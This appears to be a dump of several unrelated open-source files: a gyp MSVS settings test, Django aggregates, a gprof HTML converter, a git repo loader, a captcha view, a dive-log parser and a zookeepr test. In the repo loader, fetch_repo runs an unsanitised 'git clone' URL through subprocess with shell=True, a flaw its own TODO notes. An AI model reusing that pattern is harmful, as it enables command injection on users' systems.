'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'ValidateAllParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '4'},
'Lib': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'ExportNamedFunctions': 'd1;d2;d3',
'ForceSymbolReferences': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'Manifest': {
'AdditionalManifestFiles': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AssemblyIdentity': 'a_string',
'ComponentFileName': 'a_file_name',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a_string',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'VerboseOutput': 'true'},
'ManifestResourceCompile': {
'ResourceOutputFileName': 'my_name'},
'ProjectReference': {
'LinkLibraryDependencies': 'true',
'UseLibraryDependencyInputs': 'false'},
'': {
'EmbedManifest': 'true',
'GenerateManifest': 'true',
'IgnoreImportLibrary': 'true',
'LinkIncremental': 'false'}}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
def testConvertToMSBuildSettings_actual(self):
"""Tests the conversion of an actual project.
A VS2008 project with most of the options defined was created through the
VS2008 IDE. It was then converted to VS2010. The tool settings found in
the .vcproj and .vcxproj files were converted to the two dictionaries
msvs_settings and expected_msbuild_settings.
Note that for many settings, the VS2010 converter adds macros like
%(AdditionalIncludeDirectories) to make sure than inherited values are
included. Since the Gyp projects we generate do not use inheritance,
we removed these macros. They were:
ClCompile:
AdditionalIncludeDirectories: ';%(AdditionalIncludeDirectories)'
AdditionalOptions: ' %(AdditionalOptions)'
AdditionalUsingDirectories: ';%(AdditionalUsingDirectories)'
DisableSpecificWarnings: ';%(DisableSpecificWarnings)',
ForcedIncludeFiles: ';%(ForcedIncludeFiles)',
ForcedUsingFiles: ';%(ForcedUsingFiles)',
PreprocessorDefinitions: ';%(PreprocessorDefinitions)',
UndefinePreprocessorDefinitions:
';%(UndefinePreprocessorDefinitions)',
Link:
AdditionalDependencies: ';%(AdditionalDependencies)',
AdditionalLibraryDirectories: ';%(AdditionalLibraryDirectories)',
AdditionalManifestDependencies:
';%(AdditionalManifestDependencies)',
AdditionalOptions: ' %(AdditionalOptions)',
AddModuleNamesToAssembly: ';%(AddModuleNamesToAssembly)',
AssemblyLinkResource: ';%(AssemblyLinkResource)',
DelayLoadDLLs: ';%(DelayLoadDLLs)',
EmbedManagedResourceFile: ';%(EmbedManagedResourceFile)',
ForceSymbolReferences: ';%(ForceSymbolReferences)',
IgnoreSpecificDefaultLibraries:
';%(IgnoreSpecificDefaultLibraries)',
ResourceCompile:
AdditionalIncludeDirectories: ';%(AdditionalIncludeDirectories)',
AdditionalOptions: ' %(AdditionalOptions)',
PreprocessorDefinitions: ';%(PreprocessorDefinitions)',
Manifest:
AdditionalManifestFiles: ';%(AdditionalManifestFiles)',
AdditionalOptions: ' %(AdditionalOptions)',
InputResourceManifests: ';%(InputResourceManifests)',
"""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/more',
'AdditionalUsingDirectories': 'test',
'AssemblerListingLocation': '$(IntDir)\\a',
'AssemblerOutput': '1',
'BasicRuntimeChecks': '3',
'BrowseInformation': '1',
'BrowseInformationFile': '$(IntDir)\\e',
'BufferSecurityCheck': 'false',
'CallingConvention': '1',
'CompileAs': '1',
'DebugInformationFormat': '4',
'DefaultCharIsUnsigned': 'true',
'Detect64BitPortabilityProblems': 'true',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'abc',
'EnableEnhancedInstructionSet': '1',
'EnableFiberSafeOptimizations': 'true',
'EnableFunctionLevelLinking': 'true',
'EnableIntrinsicFunctions': 'true',
'EnablePREfast': 'true',
'ErrorReporting': '2',
'ExceptionHandling': '2',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': '2',
'FloatingPointExceptions': 'true',
'FloatingPointModel': '1',
'ForceConformanceInForLoopScope': 'false',
'ForcedIncludeFiles': 'def',
'ForcedUsingFiles': 'ge',
'GeneratePreprocessedFile': '2',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': '1',
'KeepComments': 'true',
'MinimalRebuild': 'true',
'ObjectFile': '$(IntDir)\\b',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMP': 'true',
'Optimization': '3',
'PrecompiledHeaderFile': '$(IntDir)\\$(TargetName).pche',
'PrecompiledHeaderThrough': 'StdAfx.hd',
'PreprocessorDefinitions': 'WIN32;_DEBUG;_CONSOLE',
'ProgramDataBaseFileName': '$(IntDir)\\vc90b.pdb',
'RuntimeLibrary': '3',
'RuntimeTypeInfo': 'false',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '3',
'SuppressStartupBanner': 'false',
'TreatWChar_tAsBuiltInType': 'false',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'wer',
'UseFullPaths': 'true',
'UsePrecompiledHeader': '0',
'UseUnicodeResponseFiles': 'false',
'WarnAsError': 'true',
'WarningLevel': '3',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': '$(IntDir)\\c'},
'VCLinkerTool': {
'AdditionalDependencies': 'zx',
'AdditionalLibraryDirectories': 'asd',
'AdditionalManifestDependencies': 's2',
'AdditionalOptions': '/mor2',
'AddModuleNamesToAssembly': 'd1',
'AllowIsolation': 'false',
'AssemblyDebug': '1',
'AssemblyLinkResource': 'd5',
'BaseAddress': '23423',
'CLRImageType': '3',
'CLRThreadAttribute': '1',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '0',
'DelayLoadDLLs': 'd4',
'DelaySign': 'true',
'Driver': '2',
'EmbedManagedResourceFile': 'd2',
'EnableCOMDATFolding': '1',
'EnableUAC': 'false',
'EntryPointSymbol': 'f5',
'ErrorReporting': '2',
'FixedBaseAddress': '1',
'ForceSymbolReferences': 'd3',
'FunctionOrder': 'fssdfsd',
'GenerateDebugInformation': 'true',
'GenerateManifest': 'false',
'GenerateMapFile': 'true',
'HeapCommitSize': '13',
'HeapReserveSize': '12',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreDefaultLibraryNames': 'flob;flok',
'IgnoreEmbeddedIDL': 'true',
'IgnoreImportLibrary': 'true',
'ImportLibrary': 'f4',
'KeyContainer': 'f7',
'KeyFile': 'f6',
'LargeAddressAware': '2',
'LinkIncremental': '0',
'LinkLibraryDependencies': 'false',
'LinkTimeCodeGeneration': '1',
'ManifestFile':
'$(IntDir)\\$(TargetFileName).2intermediate.manifest',
'MapExports': 'true',
'MapFileName': 'd5',
'MergedIDLBaseFileName': 'f2',
'MergeSections': 'f5',
'MidlCommandFile': 'f1',
'ModuleDefinitionFile': 'sdsd',
'OptimizeForWindows98': '2',
'OptimizeReferences': '2',
'OutputFile': '$(OutDir)\\$(ProjectName)2.exe',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': '$(TargetDir)$(TargetName).pgdd',
'ProgramDatabaseFile': 'Flob.pdb',
'RandomizedBaseAddress': '1',
'RegisterOutput': 'true',
'ResourceOnlyDLL': 'true',
'SetChecksum': 'false',
'ShowProgress': '1',
'StackCommitSize': '15',
'StackReserveSize': '14',
'StripPrivateSymbols': 'd3',
'SubSystem': '1',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'false',
'SwapRunFromCD': 'true',
'SwapRunFromNet': 'true',
'TargetMachine': '1',
'TerminalServerAware': '1',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'f3',
'TypeLibraryResourceID': '12',
'UACExecutionLevel': '2',
'UACUIAccess': 'true',
'UseLibraryDependencyInputs': 'true',
'UseUnicodeResponseFiles': 'false',
'Version': '333'},
'VCResourceCompilerTool': {
'AdditionalIncludeDirectories': 'f3',
'AdditionalOptions': '/more3',
'Culture': '3084',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': '_UNICODE;UNICODE2',
'ResourceOutputFileName': '$(IntDir)/$(InputName)3.res',
'ShowProgress': 'true'},
'VCManifestTool': {
'AdditionalManifestFiles': 'sfsdfsd',
'AdditionalOptions': 'afdsdafsd',
'AssemblyIdentity': 'sddfdsadfsa',
'ComponentFileName': 'fsdfds',
'DependencyInformationFile': '$(IntDir)\\mt.depdfd',
'EmbedManifest': 'false',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'asfsfdafs',
'ManifestResourceFile':
'$(IntDir)\\$(TargetFileName).embed.manifest.resfdsf',
'OutputManifestFile': '$(TargetPath).manifestdfs',
'RegistrarScriptFile': 'sdfsfd',
'ReplacementsFile': 'sdffsd',
'SuppressStartupBanner': 'false',
'TypeLibraryFile': 'sfsd',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'sfsd',
'UseFAT32Workaround': 'true',
'UseUnicodeResponseFiles': 'false',
'VerboseOutput': 'true'}}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/more /J',
'AdditionalUsingDirectories': 'test',
'AssemblerListingLocation': '$(IntDir)a',
'AssemblerOutput': 'AssemblyCode',
'BasicRuntimeChecks': 'EnableFastChecks',
'BrowseInformation': 'true',
'BrowseInformationFile': '$(IntDir)e',
'BufferSecurityCheck': 'false',
'CallingConvention': 'FastCall',
'CompileAs': 'CompileAsC',
'DebugInformationFormat': 'EditAndContinue',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'abc',
'EnableEnhancedInstructionSet': 'StreamingSIMDExtensions',
'EnableFiberSafeOptimizations': 'true',
'EnablePREfast': 'true',
'ErrorReporting': 'Queue',
'ExceptionHandling': 'Async',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': 'Size',
'FloatingPointExceptions': 'true',
'FloatingPointModel': 'Strict',
'ForceConformanceInForLoopScope': 'false',
'ForcedIncludeFiles': 'def',
'ForcedUsingFiles': 'ge',
'FunctionLevelLinking': 'true',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': 'OnlyExplicitInline',
'IntrinsicFunctions': 'true',
'MinimalRebuild': 'true',
'ObjectFileName': '$(IntDir)b',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMPSupport': 'true',
'Optimization': 'Full',
'PrecompiledHeader': 'NotUsing', # Actual conversion gives ''
'PrecompiledHeaderFile': 'StdAfx.hd',
'PrecompiledHeaderOutputFile': '$(IntDir)$(TargetName).pche',
'PreprocessKeepComments': 'true',
'PreprocessorDefinitions': 'WIN32;_DEBUG;_CONSOLE',
'PreprocessSuppressLineNumbers': 'true',
'PreprocessToFile': 'true',
'ProgramDataBaseFileName': '$(IntDir)vc90b.pdb',
'RuntimeLibrary': 'MultiThreadedDebugDLL',
'RuntimeTypeInfo': 'false',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '4Bytes',
'SuppressStartupBanner': 'false',
'TreatWarningAsError': 'true',
'TreatWChar_tAsBuiltInType': 'false',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'wer',
'UseFullPaths': 'true',
'WarningLevel': 'Level3',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': '$(IntDir)c'},
'Link': {
'AdditionalDependencies': 'zx',
'AdditionalLibraryDirectories': 'asd',
'AdditionalManifestDependencies': 's2',
'AdditionalOptions': '/mor2',
'AddModuleNamesToAssembly': 'd1',
'AllowIsolation': 'false',
'AssemblyDebug': 'true',
'AssemblyLinkResource': 'd5',
'BaseAddress': '23423',
'CLRImageType': 'ForceSafeILImage',
'CLRThreadAttribute': 'MTAThreadingAttribute',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '',
'DelayLoadDLLs': 'd4',
'DelaySign': 'true',
'Driver': 'UpOnly',
'EmbedManagedResourceFile': 'd2',
'EnableCOMDATFolding': 'false',
'EnableUAC': 'false',
'EntryPointSymbol': 'f5',
'FixedBaseAddress': 'false',
'ForceSymbolReferences': 'd3',
'FunctionOrder': 'fssdfsd',
'GenerateDebugInformation': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': '13',
'HeapReserveSize': '12',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreEmbeddedIDL': 'true',
'IgnoreSpecificDefaultLibraries': 'flob;flok',
'ImportLibrary': 'f4',
'KeyContainer': 'f7',
'KeyFile': 'f6',
'LargeAddressAware': 'true',
'LinkErrorReporting': 'QueueForNextLogin',
'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
'ManifestFile': '$(IntDir)$(TargetFileName).2intermediate.manifest',
'MapExports': 'true',
'MapFileName': 'd5',
'MergedIDLBaseFileName': 'f2',
'MergeSections': 'f5',
'MidlCommandFile': 'f1',
'ModuleDefinitionFile': 'sdsd',
'NoEntryPoint': 'true',
'OptimizeReferences': 'true',
'OutputFile': '$(OutDir)$(ProjectName)2.exe',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': '$(TargetDir)$(TargetName).pgdd',
'ProgramDatabaseFile': 'Flob.pdb',
'RandomizedBaseAddress': 'false',
'RegisterOutput': 'true',
'SetChecksum': 'false',
'ShowProgress': 'LinkVerbose',
'StackCommitSize': '15',
'StackReserveSize': '14',
'StripPrivateSymbols': 'd3',
'SubSystem': 'Console',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'false',
'SwapRunFromCD': 'true',
'SwapRunFromNET': 'true',
'TargetMachine': 'MachineX86',
'TerminalServerAware': 'false',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'f3',
'TypeLibraryResourceID': '12',
'UACExecutionLevel': 'RequireAdministrator',
'UACUIAccess': 'true',
'Version': '333'},
'ResourceCompile': {
'AdditionalIncludeDirectories': 'f3',
'AdditionalOptions': '/more3',
'Culture': '0x0c0c',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': '_UNICODE;UNICODE2',
'ResourceOutputFileName': '$(IntDir)%(Filename)3.res',
'ShowProgress': 'true'},
'Manifest': {
'AdditionalManifestFiles': 'sfsdfsd',
'AdditionalOptions': 'afdsdafsd',
'AssemblyIdentity': 'sddfdsadfsa',
'ComponentFileName': 'fsdfds',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'asfsfdafs',
'OutputManifestFile': '$(TargetPath).manifestdfs',
'RegistrarScriptFile': 'sdfsfd',
'ReplacementsFile': 'sdffsd',
'SuppressStartupBanner': 'false',
'TypeLibraryFile': 'sfsd',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'sfsd',
'VerboseOutput': 'true'},
'ProjectReference': {
'LinkLibraryDependencies': 'false',
'UseLibraryDependencyInputs': 'true'},
'': {
'EmbedManifest': 'false',
'GenerateManifest': 'false',
'IgnoreImportLibrary': 'true',
'LinkIncremental': ''
},
'ManifestResourceCompile': {
'ResourceOutputFileName':
'$(IntDir)$(TargetFileName).embed.manifest.resfdsf'}
}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
if __name__ == '__main__':
unittest.main()
| mit |
jenalgit/django | django/db/models/sql/aggregates.py | 174 | 4843 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = self._ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = self._computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
# Two fake fields used to identify aggregate types in data-conversion operations.
@cached_property
def _ordinal_aggregate_field(self):
return IntegerField()
@cached_property
def _computed_aggregate_field(self):
return FloatField()
def relabeled_clone(self, change_map):
clone = copy.copy(self)
if isinstance(self.col, (list, tuple)):
clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
return clone
def as_sql(self, compiler, connection):
"Return the aggregate, rendered as SQL with parameters."
params = []
if hasattr(self.col, 'as_sql'):
field_name, params = self.col.as_sql(compiler, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join(compiler(c) for c in self.col)
else:
field_name = compiler(self.col)
substitutions = {
'function': self.sql_function,
'field': field_name
}
substitutions.update(self.extra)
return self.sql_template % substitutions, params
def get_group_by_cols(self):
return []
@property
def output_field(self):
return self.field
class Avg(Aggregate):
is_computed = True
sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| bsd-3-clause |
mujiansu/arangodb | 3rdParty/V8-4.3.61/third_party/python_26/Tools/scripts/gprof2html.py | 64 | 2171 | #! /usr/bin/env python2.3
"""Transform gprof(1) output into useful HTML."""
import re, os, sys, cgi, webbrowser
header = """\
<html>
<head>
<title>gprof output (%s)</title>
</head>
<body>
<pre>
"""
trailer = """\
</pre>
</body>
</html>
"""
def add_escapes(input):
for line in input:
yield cgi.escape(line)
def main():
filename = "gprof.out"
if sys.argv[1:]:
filename = sys.argv[1]
outputfilename = filename + ".html"
input = add_escapes(file(filename))
output = file(outputfilename, "w")
output.write(header % filename)
for line in input:
output.write(line)
if line.startswith(" time"):
break
labels = {}
for line in input:
m = re.match(r"(.* )(\w+)\n", line)
if not m:
output.write(line)
break
stuff, fname = m.group(1, 2)
labels[fname] = fname
output.write('%s<a name="flat:%s" href="#call:%s">%s</a>\n' %
(stuff, fname, fname, fname))
for line in input:
output.write(line)
if line.startswith("index % time"):
break
for line in input:
m = re.match(r"(.* )(\w+)(( <cycle.*>)? \[\d+\])\n", line)
if not m:
output.write(line)
if line.startswith("Index by function name"):
break
continue
prefix, fname, suffix = m.group(1, 2, 3)
if fname not in labels:
output.write(line)
continue
if line.startswith("["):
output.write('%s<a name="call:%s" href="#flat:%s">%s</a>%s\n' %
(prefix, fname, fname, fname, suffix))
else:
output.write('%s<a href="#call:%s">%s</a>%s\n' %
(prefix, fname, fname, suffix))
for line in input:
for part in re.findall(r"(\w+(?:\.c)?|\W+)", line):
if part in labels:
part = '<a href="#call:%s">%s</a>' % (part, part)
output.write(part)
output.write(trailer)
output.close()
webbrowser.open("file:" + os.path.abspath(outputfilename))
if __name__ == '__main__':
main()
| apache-2.0 |
Aryan-Barbarian/bigbang | bigbang/repo_loader.py | 3 | 7776 | from git_repo import GitRepo, MultiGitRepo
import json;
import os;
import re;
import subprocess;
import sys;
import pandas as pd
import requests
import fnmatch
from IPython.nbformat import current as nbformat
from IPython.nbconvert import PythonExporter
import networkx as nx
import compiler
from compiler.ast import From
from compiler.ast import Import
from config.config import CONFIG
repoLocation = CONFIG.repo_path
examplesLocation = CONFIG.urls_path
nameRegex = re.compile('([^/]*)(\\.git$)')
fileRegex = re.compile('.*\/(.*)')
def repo_already_exists(filepath):
return os.path.exists(filepath);
"""
Converts a github url (e.g. https://github.com/sbenthall/bigbang.git) to
a human-readable name (bigbang) by looking at the word between the last "/" and ".git".
"""
def url_to_name(url):
url = url.replace("\n", "");
name = nameRegex.search(url).group(1);
return name;
"""
Converts a name of a repo to its filepath.
Currently, these go to ../archives/sample_git_repos/{name}/
"""
def name_to_filepath(name):
newLoc = repoLocation + name
return newLoc
"""
Converts a filepath (../archives/sample_git_repos/{name}) to a name.
Note that this will fail if the filepath ends in a "/". It must end
in the name of the folder.
Thus, it should be ../archives/sample_git_repos/{name} not
../archives/sample_git_repos/{name}/
"""
def filepath_to_name(filepath):
name = fileRegex.search(filepath).group(1);
return name;
"""
Converts a dictionary of dependencies into a NetworkX DiGraph.
"""
def create_graph(dic):
G = nx.DiGraph()
for f in dic:
for dependency in dic[f]:
G.add_edge(f, dependency)
return G
"""
Returns a list of the Python files in a directory, and
converts IPython notebooks into Python source code and
includes them with the Python files.
"""
def get_files(filepath):
os.chdir(filepath)
files = []
for root, dirnames, filenames in os.walk("."):
for filename in fnmatch.filter(filenames, '*.py'):
files.append(os.path.join(root, filename))
for filename in fnmatch.filter(filenames, '*.ipynb'):
try:
with open(filename) as fh:
nb = nbformat.reads_json(fh.read())
export_path = filename.replace(".ipynb", ".py")
exporter = PythonExporter()
source, meta = exporter.from_notebook_node(nb)
with open(export_path, 'w+') as fh:
fh.writelines(source)
files.append()
except: #may have issues with JSON encoding
pass
return files
"""
Given a directory, collects all Python and IPython files and
uses the Python AST to create a dictionary of dependencies from them.
Returns the dependencies converted into a NetworkX graph.
"""
def get_dependency_network(filepath):
files = get_files(filepath)
dependencies = {}
for file in set(files):
ast = compiler.parseFile(file)
for node in ast.getChildren()[1].nodes:
if isinstance(node, Import):
if file in dependencies:
dependencies[file].append(node.names[0][0])
else:
dependencies[file] = [node.names[0][0]]
elif isinstance(node, From):
if file in dependencies:
dependencies[file].append(node.modname + "/" + node.names[0][0])
return create_graph(dependencies)
"""
Takes three different options for type:
'remote' : basically a git url
'name' (default): a name like 'scipy' which the method can expand to a url
'local' : a filepath to a file on the local system (basically an existing git directory on this computer)
This returns an initialized GitRepo object with its data and name already loaded.
"""
def get_repo(repo_in, in_type='name', update = False):
# Input is name
if in_type == 'name':
filepath = name_to_filepath(repo_in)
ans = None;
if not update:
ans = get_cache(repo_in);
if ans is not None:
return ans;
print("Checking for " + str(repo_in) + " at " + str(filepath));
ans = get_repo(filepath, 'local', update);
if isinstance(ans, GitRepo):
ans.commit_data.to_csv(cache_path(repo_in), sep='\t', encoding='utf-8') # We cache it hopefully???
else:
print("We failed to find a local copy of this repo")
return ans;
# Input is a local file
if in_type == 'local':
if repo_already_exists(repo_in):
name = filepath_to_name(repo_in);
return GitRepo(url=repo_in, name=name);
else:
print("Invalid filepath: " + repo_in);
return None;
if in_type == 'remote':
name = url_to_name(repo_in);
filepath = name_to_filepath(name);
if not repo_already_exists(filepath):
print("Gloning the repo from remote")
fetch_repo(repo_in);
return get_repo(name, 'name', update);
else:
print("Invalid input") # TODO: Clarify this error
return None
"""
Takes in a git url and uses shell commands
to clone the git repo into sample_git_repos/
TODO: We shouldn't use this with shell=True because of security concerns.
"""
def fetch_repo(url):
# TODO: We are repeatedly calculating name and filepath
url = url.replace("\n", "");
name = url_to_name(url);
newLoc = name_to_filepath(name);
command = ["git " + "clone " + url + " " + newLoc];
subprocess.call(command, shell = True);
"""
Takes in a name (bigbang)
Returns where its cached file should be (../sample_git_repos/bigbang_backup.csv)
"""
def cache_path(name):
return repoLocation + str(name) + "_backup.csv"
"""
Takes in a name (bigbang)
Returns a GitRepo object containing the cache data if the cache exists
Returns None otherwise.
"""
def get_cache(name):
filepath = cache_path(name);
if os.path.exists(filepath):
c = pd.read_csv(filepath, sep='\t', encoding='utf-8');
fp = name_to_filepath(name);
ans = GitRepo(name=name, url=fp, cache=c);
return ans;
return None;
"""
As of now, this only accepts names/repos, not local urls
TODO: This could be optimized
"""
def get_multi_repo(repo_names=None, repos=None):
if repos is None:
repos = list()
for name in repo_names:
repo = get_repo(name, in_type = "name")
repos.append(repo);
for repo in repos:
repo.commit_data["Repo Name"] = repo.name;
ans = MultiGitRepo(repos);
return ans
"""
fetches a list of all repos in an organization from github
and gathers their URL's (of the form *.git)
It dumps these into ../examples/{org_name}_urls.txt
"""
def load_org_repos(org_name):
github_url = "https://api.github.com/orgs/" + org_name + "/repos"
r = requests.get(github_url)
data = r.json()
urls = []
for repo in data:
if "git_url" in repo:
urls.append(repo["git_url"])
if len(urls) == 0:
print("Found no repos in group: " + str(org_name))
return None
else:
addr = examplesLocation + str(org_name) + "_urls.txt"
f = open(addr, 'w')
f.write("\n".join(urls))
print("Wrote git urls to " + addr)
return urls
"""
Checks to see if we have the urls for a given org
If we don't, it fetches them.
Once we do, it returns a list of GitRepo objects from the urls.
"""
def get_org_repos(org_name):
addr = examplesLocation + str(org_name) + "_urls.txt"
urls = None
if not os.path.isfile(addr):
urls = load_org_repos(org_name);
else:
urls = open(addr, "r")
ans = list()
for url in urls:
ans.append(get_repo(url, "remote"))
return ans;
def get_org_multirepo(org_name):
repos = get_org_repos(org_name)
ans = get_multi_repo(repos=repos)
return ans
| gpl-2.0 |
Jaidan/django-simple-captcha | captcha/tests/views.py | 3 | 1244 | from django import forms
from captcha.fields import CaptchaField
from django.template import Context, RequestContext, loader
from django.http import HttpResponse
TEST_TEMPLATE = r'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>captcha test</title>
</head>
<body>
{% if passed %}
<p style="color:green">Form validated</p>
{% endif %}
<form action="{% url captcha-test %}" method="post">
{{form.as_p}}
<p><input type="submit" value="Continue →"></p>
</form>
</body>
</html>
'''
def test(request):
class CaptchaTestForm(forms.Form):
subject = forms.CharField(max_length=100)
sender = forms.EmailField()
captcha = CaptchaField(help_text='asdasd')
if request.POST:
form = CaptchaTestForm(request.POST)
if form.is_valid():
passed = True
else:
form = CaptchaTestForm()
t = loader.get_template_from_string(TEST_TEMPLATE)
return HttpResponse(t.render(RequestContext(request, locals())))
| mit |
AquaBSD/libbuhlmann | test/parse_dive.py | 1 | 1088 | #! /usr/bin/python
import argparse
from xml.dom import minidom
O2=21
H2=0
parser = argparse.ArgumentParser(description='Parse a dive in xml formt.')
parser.add_argument('-f', '--file', required=True,
dest='path', help='path to xml file')
args = parser.parse_args()
path = args.path
doc = minidom.parse(path)
gas = doc.getElementsByTagName('DiveMixture')
for subNode in gas.item(0).childNodes:
if (subNode.nodeName == "Oxygen"):
O2=float(subNode.childNodes[0].nodeValue)/100
if (subNode.nodeName == "Helium"):
H2=float(subNode.childNodes[0].nodeValue)/100
nodes = doc.getElementsByTagName('Dive.Sample')
for node in nodes:
if node.hasChildNodes() and len(node.childNodes) > 8:
for subNode in node.childNodes:
if (subNode.nodeName == "Depth" and subNode.hasChildNodes()):
depth = (float(subNode.childNodes[0].nodeValue) / 10) + 1
if (subNode.nodeName == "Time" and subNode.hasChildNodes()):
time = float(subNode.childNodes[0].nodeValue) / 60
print ("%.2f %.2f %.2f %.2f" % (time , depth, O2, H2))
| isc |
zookeepr/zookeepr | zkpylons/tests/functional/test_account.py | 3 | 15167 | from datetime import datetime, timedelta
import re
from zk.model import Person, PasswordResetConfirmation
from routes import url_for
from .fixtures import PersonFactory, PasswordResetConfirmationFactory
from .utils import do_login, isSignedIn
class TestPersonController(object):
def test_registration_confirmation_url(self, map):
"""test the routing of the registration confirmation url"""
expect = dict(controller='person', action='confirm', confirm_hash='N')
assert map.match('/person/confirm/N') == expect
def test_registratrion_confirmation_named_route(self):
reg_confirm = url_for('acct_confirm', confirm_hash='N')
assert reg_confirm == '/person/confirm/N'
def test_person_signin_routing(self, map):
expect = dict(controller='person', action='signin')
assert map.match('/person/signin') == expect
def test_person_signin_url(self):
assert url_for(controller='person', action='signin', id=None) == '/person/signin'
def test_person_signout_url(self):
